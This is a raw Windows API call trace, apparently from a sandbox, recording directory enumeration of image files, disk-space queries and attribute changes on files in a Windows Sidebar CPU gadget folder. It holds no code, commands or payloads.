ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb904ba93, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x89, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_box_top.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb904ba93, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb904ba93, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_left.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9071bf2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9071bf2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50421bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa5, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_bottom_right.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9071bf2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9071bf2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb506831c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_left.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb506831c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_corner_top_right.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb506831c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x83, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider.png", cAlternateFileName="")) returned 1 [0132.473] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb508e47c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_left.png", cAlternateFileName="")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb508e47c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_divider_right.png", cAlternateFileName="")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90e400f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90e400f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50b45dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_disabled.png", cAlternateFileName="")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb910a16e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb910a16e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50da73c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_hover.png", cAlternateFileName="")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91302cd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb91302cd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50da73c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_pressed.png", cAlternateFileName="")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91302cd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb91302cd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb50da73c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_left_rest.png", cAlternateFileName="")) returned 1 [0132.474] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb915642c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb915642c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb510089c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_disabled.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb915642c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb915642c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb510089c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x417, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_hover.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb915642c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb915642c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb510089c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x45f, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_pressed.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb917c58b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb917c58b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb51269fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x358, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings_right_rest.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e82a1f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8e82a1f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb533bd3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="spacer_highlights.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ea8b7e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ea8b7e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb533bd3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4eac, dwReserved0=0x0, dwReserved1=0x0, cFileName="square.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ececdd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ececdd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb533bd3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_dot.png", cAlternateFileName="")) returned 1 [0132.475] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ea8b7e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ea8b7e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb5361e9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1db, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_h.png", cAlternateFileName="")) returned 1 [0132.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ea8b7e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ea8b7e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb5361e9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_m.png", cAlternateFileName="")) returned 1 [0132.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ececdd, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ececdd, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb54466dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_s.png", cAlternateFileName="")) returned 1 [0132.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ef4e3c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ef4e3c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56a7cdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4d87, dwReserved0=0x0, dwReserved1=0x0, cFileName="square_settings.png", cAlternateFileName="")) returned 1 [0132.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8ef4e3c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8ef4e3c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56a7cdc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x519b, dwReserved0=0x0, dwReserved1=0x0, cFileName="system.png", cAlternateFileName="")) returned 1 [0132.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f410fa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f410fa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56cde3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xf3, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_dot.png", cAlternateFileName="")) returned 1 [0132.476] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f1af9b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f1af9b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56cde3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_h.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f1af9b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f1af9b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56cde3c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_m.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f1af9b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f1af9b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56f3f9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_s.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f410fa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f410fa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb56f3f9c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5a3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="system_settings.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f67259, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f67259, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb571a0fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4c3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fd9676, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fd9676, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb574025c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbcb, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_dot.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f8d3b8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f8d3b8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb574025c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_h.png", cAlternateFileName="")) returned 1 [0132.477] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f8d3b8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8f8d3b8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb57663bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x169, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_m.png", cAlternateFileName="")) returned 1 [0132.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fb3517, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fb3517, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb5ad235c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_s.png", cAlternateFileName="")) returned 1 [0132.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb621c6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5385, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_settings.png", cAlternateFileName="")) returned 1 [0132.478] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8fff7d5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8fff7d5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb621c6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5385, dwReserved0=0x0, dwReserved1=0x0, cFileName="trad_settings.png", cAlternateFileName="")) returned 0 [0132.479] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0132.479] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0132.479] CoTaskMemFree (pv=0x4e1c10) [0132.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.492] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba48750b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba48750b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb79c415c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0132.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0132.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7c4b8bc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb7c4b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb7c4b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x23e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0132.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0132.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ad66a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba4ad66a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xba58159c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0132.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.494] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.525] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0132.527] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.533] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0132.535] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0132.542] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0132.543] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x184999e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x184bfb40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.543] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba48750b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba48750b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb79c415c, 